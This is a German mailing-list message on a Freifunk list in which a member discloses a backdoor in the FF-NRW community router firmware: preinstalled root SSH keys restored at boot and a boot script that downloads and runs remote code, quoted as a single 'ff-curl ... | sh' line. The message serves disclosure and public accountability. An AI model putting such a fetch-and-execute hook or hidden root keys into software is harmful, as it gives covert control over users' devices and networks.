wtf - viel mehr fällt mir dazu erstmal nicht ein. Ich dachte authorized_keys wären nur für _eigene_ Router?
On 03/26/2015 08:20 PM, Malte Moeller wrote: > Hallo Vorstand vom Verbund Freie Netzwerke NRW, Hallo Liste, > > da für mich in Frage kam bei einem Bekannten in Leverkusen einen "HotSpot" > von euch aufzustellen habe ich mir eure Firmware zum Test selber > Installiert. > > Die Firmware enthält von vorne herein mehrere ssh keys die vollen root > Zugang zu den Geräten (und damit dem gesamten lokalen Netzwerk) > ermöglichen, neben den privaten Schlüsseln von [email protected] und > [email protected] werden mutmaßlich auch die Schlüssel > von Servern hinzugefügt: maintsb, maintrw1 und maintrw2. Siehe: > https://github.com/FF-NRW/Firmware/blob/master/authorized_keys.default > > Werden diese Schlüssel gelöscht, stellt sie ein Skript beim booten wieder > her. > > Zudem startet der Knoten per default, zumindest bei jedem Bootvorgang, > beliebigen code, den er mit dem Skript /etc/freifunk/start.backdoor nach > lädt: > > ff-curl boot/$(cat /proc/sys/kernel/hostname) | sh > > Derartig konfigurierte Knoten wurden auch in mindesten einem Parteibüro der > Piraten aufgestellt. Es ist davon auszugehen, dass auch die andern Knoten > im Feld, Beispielsweise im Rathaus in Wermelskirchen über derartiges > verfügen: > http://freifunk.liztv.net/batmap/51.141062277444036,7.214093533172478,18 > > Bei einer Durchsicht eures gits habe ich festgestellt, dass zumindest das > Backdoor Modul inzwischen wieder entfernt wurde: > https://github.com/FF-NRW/Firmware/commit/bd682a057894c6d06136a18378de66c640abc2c3 > > Allerdings vom selben User, der es im Juli 2014 implementiert hat: > https://github.com/FF-NRW/Firmware/commits/87251c48cb68b82f67647b2fa182d1b045500268/files/default/etc/freifunk/start.backdoor > > Ich fordere den Vorstand des VfN auf die Angelegenheit zu klären und sofern > sie strafrechtlich relevant ist gegen die entsprechenden Mitglieder Anzeige > zu erstatten. Eine öffentliche Stellungnahme zur vergangenen Praxis und dem > zukünftigen Vorgehen halte ich für zwingend notwendig! > > Vom Förderverein Freie Netzwerke e. V. wünsche ich mir eine klare > Distanzierung von derartigem Verhalten. Ich persönlich empfinde es als > unerträglich, dass ein Verein, der derartiges Verhalten von einem > Vorstandsmitglied duldet, von euch als Freifunk anerkannt wird. Schlimmer, > sich Freifunk NRW nennt und damit weitere Vereine in Verruf zieht. > > Viele Grüße > Malte Möller > > > > _______________________________________________ > WLANtalk mailing list > [email protected] > Abonnement abbestellen? -> > http://lists.freifunk.net/mailman/listinfo/wlantalk-freifunk.net > > Weitere Infos zu den freifunk.net Mailinglisten und zur An- und Abmeldung > unter http://freifunk.net/mailinglisten >
signature.asc
Description: OpenPGP digital signature
_______________________________________________ WLANtalk mailing list [email protected] Abonnement abbestellen? -> http://lists.freifunk.net/mailman/listinfo/wlantalk-freifunk.net Weitere Infos zu den freifunk.net Mailinglisten und zur An- und Abmeldung unter http://freifunk.net/mailinglisten
